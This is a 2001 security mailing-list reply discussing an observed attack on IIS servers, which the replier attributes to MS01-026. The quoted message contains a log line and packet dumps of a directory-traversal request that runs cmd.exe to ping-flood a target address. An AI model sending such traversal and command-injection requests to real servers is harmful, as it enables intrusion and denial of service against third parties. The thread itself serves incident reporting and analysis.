Re: NEW DEVELOPMENT -- Attempts at using CodeRed II systems to perform Denial of Service Attacks and Possible Attacking Tool
From: Blake Frantz (blake@mc.net)Date: 08/08/01
- Previous message: Tony Langdon: "RE: Was RE: disinfection tool -- now a minor rant."
- In reply to: Eyes to the Skies.: "NEW DEVELOPMENT -- Attempts at using CodeRed II systems to perform Denial of Service Attacks and Possible Attacking Tool"
- Next in thread: Ryan Russell: "Re: NEW DEVELOPMENT -- Attempts at using CodeRed II systems to perform Denial of Service Attacks and Possible Attacking Tool"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Tue, 7 Aug 2001 18:32:54 -0500 (CDT) From: Blake Frantz <blake@mc.net> To: "Eyes to the Skies." <sgtphou@fire-eyes.yi.org> Subject: Re: NEW DEVELOPMENT -- Attempts at using CodeRed II systems to perform Denial of Service Attacks and Possible Attacking Tool Message-ID: <Pine.BSI.4.05L.10108071829290.9649-100000@maxx.mc.net>
This attack appears to be more related to MS01-026 than Code Red.
-Blake
On Tue, 7 Aug 2001, Eyes to the Skies. wrote:
> Okay this is scary.
>
> This looks like an attempt to use a CodeRed II infected system to
> perform a denial of service attack. I don't think I need to stress the
> severity of this.
>
> ==> /var/log/apache/access_log <==
> [deleted host] - - [07/Aug/2001:17:19:35 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ping.exe+"-v"+igmp+"-t"+"-l"+65000+[deleted
> target ip]+"-n"+7000+"-w"+0" 404 -
>
> TCPDUMP: ( i have only removed the source, since editing out the target
> ip would bork the dump...)
>
> 17:19:34.539092 xxx.xxx.xxx.3385 > tnt1a-31.flint.corecomm.net.ww
> w: P [bad tcp cksum 6ca7!] 792933628:792933745(117) ack 3456715952 win
> 16616 (DF
> ) (ttl 110, id 7881, len 157)
> 0x0000 4500 009d 1ec9 4000 6e06 f3dd d519 f9a4 E.....@.n.......
> 0x0010 d8d6 521f 0d39 0050 2f43 34fc ce09 4cb0 ..R..9.P/C4...L.
> 0x0020 5018 40e8 4446 0000 4745 5420 2f73 6372 P.@.DF..GET./scr
> 0x0030 6970 7473 2f2e 2e0c 2e2f 7769 6e6e 742f ipts/..../winnt/
> 0x0040 7379 7374 656d 3332 2f63 6d64 2e65 7865 system32/cmd.exe
> 0x0050 3f2f 632b 7069 6e67 2e65 7865 2b22 2d76 ?/c+ping.exe+"-v
> 0x0060 222b 6967 6d70 2b22 2d74 222b 222d 6c22 "+igmp+"-t"+"-l"
> 0x0070 2b36 3530 3030 2b32 3133 2e32 352e 3933 +65000+213.25.93
> 0x0080 2e31 3230 2b22 2d6e 222b 3730 3030 2b22 .120+"-n"+7000+"
> 0x0090 2d77 222b 300d 0a0d 0a2b 300d 0a -w"+0....+0..
> 17:19:34.539626 unknown ip 0
> 0x0000 0000 0000 4510 009d 0000 0000 ff06 c196 ....E...........
> 0x0010 d519 f9a4 d8d6 521f 0d39 0050 fc34 432f ......R..9.P.4C/
> 0x0020 fc34 432f 5018 0860 7cff 0000 4745 5420 .4C/P..`|...GET.
> 0x0030 2f73 6372 6970 7473 2f2e 2e0c 2e2f 7769 /scripts/..../wi
> 0x0040 6e6e 742f 7379 7374 656d 3332 2f63 6d64 nnt/system32/cmd
> 0x0050 2e65 7865 3f2f 632b 7069 6e67 2e65 7865 .exe?/c+ping.exe
> 0x0060 2b22 2d76 222b 6967 6d70 2b22 2d74 222b +"-v"+igmp+"-t"+
> 0x0070 222d 6c22 2b36 3530 3030 2b32 3133 2e32 "-l"+65000+213.2
> 0x0080 352e 3933 2e31 3230 2b22 2d6e 222b 3730 5.93.120+"-n"+70
> 0x0090 3030 2b22 2d77 222b 300d 0a0d 0a2b 300d 00+"-w"+0....+0.
> 0x00a0 0a .
>
> 17:20:13.919075 xxx.xxx.xxx.xxx.4229 > tnt1a-31.flint.corecomm.net.ww
> w: P [bad tcp cksum 6ca7!] 841644777:841644894(117) ack 3492756124 win
> 16616 (DF
> ) (ttl 110, id 11022, len 157)
> 0x0000 4500 009d 2b0e 4000 6e06 e798 d519 f9a4 E...+.@.n.......
> 0x0010 d8d6 521f 1085 0050 322a 7ae9 d02f 3a9c ..R....P2*z../:.
> 0x0020 5018 40e8 0814 0000 4745 5420 2f73 6372 P.@.....GET./scr
> 0x0030 6970 7473 2f2e 2e0c 2e2f 7769 6e6e 742f ipts/..../winnt/
> 0x0040 7379 7374 656d 3332 2f63 6d64 2e65 7865 system32/cmd.exe
> 0x0050 3f2f 632b 7069 6e67 2e65 7865 2b22 2d76 ?/c+ping.exe+"-v
> 0x0060 222b 6967 6d70 2b22 2d74 222b 222d 6c22 "+igmp+"-t"+"-l"
> 0x0070 2b36 3530 3030 2b32 3133 2e32 352e 3933 +65000+213.25.93
> 0x0080 2e31 3230 2b22 2d6e 222b 3730 3030 2b22 .120+"-n"+7000+"
> 0x0090 2d77 222b 300d 0a0d 0a2b 300d 0a -w"+0....+0..
>
> 17:20:13.919639 unknown ip 0
> 0x0000 0000 0000 4510 009d 0000 0000 ff06 0000 ....E...........
> 0x0010 d519 f9a4 d8d6 521f 1085 0050 e97a 2a32 ......R....P.z*2
> 0x0020 e97a 2a32 5018 0860 5422 0000 4745 5420 .z*2P..`T"..GET.
> 0x0030 2f73 6372 6970 7473 2f2e 2e0c 2e2f 7769 /scripts/..../wi
> 0x0040 6e6e 742f 7379 7374 656d 3332 2f63 6d64 nnt/system32/cmd
> 0x0050 2e65 7865 3f2f 632b 7069 6e67 2e65 7865 .exe?/c+ping.exe
> 0x0060 2b22 2d76 222b 6967 6d70 2b22 2d74 222b +"-v"+igmp+"-t"+
> 0x0070 222d 6c22 2b36 3530 3030 2b32 3133 2e32 "-l"+65000+213.2
> 0x0080 352e 3933 2e31 3230 2b22 2d6e 222b 3730 5.93.120+"-n"+70
> 0x0090 3030 2b22 2d77 222b 300d 0a0d 0a2b 300d 00+"-w"+0....+0.
> 0x00a0 0a .
>
>
> As an afterthought, I saw a url driting around, realated to such an
> idea. http://www.iispacket.com/ , although I am not getting that host to
> respond.
>
> I thinks this needs immediate attention. I can't do it now, i must go to
> school.
> --
>
> http://c64.arcsnet.net/
> ICQ UIN 1551505
> "The things you own, they end up owning you." - Tylder Durden
>
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
>
>
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
- Previous message: Tony Langdon: "RE: Was RE: disinfection tool -- now a minor rant."
- In reply to: Eyes to the Skies.: "NEW DEVELOPMENT -- Attempts at using CodeRed II systems to perform Denial of Service Attacks and Possible Attacking Tool"
- Next in thread: Ryan Russell: "Re: NEW DEVELOPMENT -- Attempts at using CodeRed II systems to perform Denial of Service Attacks and Possible Attacking Tool"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
